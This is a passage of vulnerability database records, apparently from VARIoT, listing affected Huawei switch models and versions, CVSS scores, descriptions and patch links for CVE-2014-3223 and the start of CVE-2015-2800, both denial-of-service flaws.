               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c00spc500",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c03",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c01spc100",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c01spc100",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c00spc800",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c01spc100",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c03",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c03",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c00spc800",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c00spc800",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00spc800",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c03",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c00spc800",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v100r006c01spc100",
         },
         {
            model: "s2300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r006c00spc800",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r006c01spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r006c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r006c00spc500",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v100r006c00spc800",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r006c00spc800",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r006c01spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v100r006c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300 v100r006c00spc800",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300 v100r006c01spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300 v100r006c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v100r006c00spc800",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v100r006c01spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v100r006c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r006c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s3300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s3300_firmware:v100r006c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s3300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s3300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r006c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v100r006c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v100r006c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v100r006c00spc800:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
      ],
   },
   cve: "CVE-2014-3223",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-3223",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2017-05108",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-71162",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-3223",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2014-3223",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2017-05108",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201704-213",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-71162",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches. plural Huawei The product contains a data processing vulnerability.Denial of service (DoS) An attack could be made. The S9300, S2300, S3300, S5300, and S6300 are various types of switches introduced by Huawei. An attacker could exploit this vulnerability to reboot the device. The following products and versions are affected: Huawei S9300 V100R006C00SPC500 Version, V100R006C00SPC800 Version; S2300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S3300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S5300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S6300 V100R006C00SPC800 Version, V100R006C01SPC100 The version is V100R006C03",
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2014-3223",
            trust: 3.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   id: "VAR-201704-0437",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
      ],
      trust: 1.5761652277777778,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
      ],
   },
   last_update_date: "2023-12-18T14:01:39.495000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20140317-01",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
         },
         {
            title: "Huawei switch Y.1731 denial of service vulnerability patch",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/92443",
         },
         {
            title: "Repair measures for various Huawei switch security vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69059",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-19",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-329625",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3223",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2014-3223",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-04-23T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            date: "2017-04-02T00:00:00",
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            date: "2017-05-02T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            date: "2017-04-02T20:59:00.237000",
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            date: "2017-04-06T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-04-23T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-05108",
         },
         {
            date: "2017-04-05T00:00:00",
            db: "VULHUB",
            id: "VHN-71162",
         },
         {
            date: "2017-05-02T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
         {
            date: "2017-04-05T15:06:06.637000",
            db: "NVD",
            id: "CVE-2014-3223",
         },
         {
            date: "2017-04-06T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Data processing vulnerabilities in products",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2014-008274",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "lack of information",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201704-213",
         },
      ],
      trust: 0.6,
   },
}

var-201706-0187
Vulnerability from variot

The user authentication module in Huawei Campus switches S5700, S5300, S6300, and S6700 with software before V200R001SPH012 and S7700, S9300, and S9700 with software before V200R001SPH015 allows remote attackers to cause a denial of service (device restart) via vectors involving authentication, which trigger an array access violation. Huawei Campus Series Switches are prone to a denial-of-service vulnerability. Attackers can exploit this issue to restart the affected device, denying service to legitimate users. Huawei Campus switches S5700, etc. are all switch products of China's Huawei (Huawei). The user authentication module is a module for user login authentication. The following products and versions are affected: Huawei Campus switches S5700 V200R001SPH012 Version; Campus switches S5300 V200R001SPH012 Version; Campus switches S6300 V200R001SPH012 Version; Campus switches S6700 V200R001SPH012 Version; Campus switches S7700 V200R001SPH012 Version; Campus switches S9300 V200R001SPH012 Version; Campus switches S9700 V200R001SPH012 Version

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201706-0187",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s6700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s7700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5700",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph012",
         },
         {
            model: "s5700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph012",
         },
         {
            model: "s6300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph012",
         },
         {
            model: "s6700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph012",
         },
         {
            model: "s7700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph015",
         },
         {
            model: "s9300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph015",
         },
         {
            model: "s9700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001sph015",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:*:*:*:*:*:*:*:*",
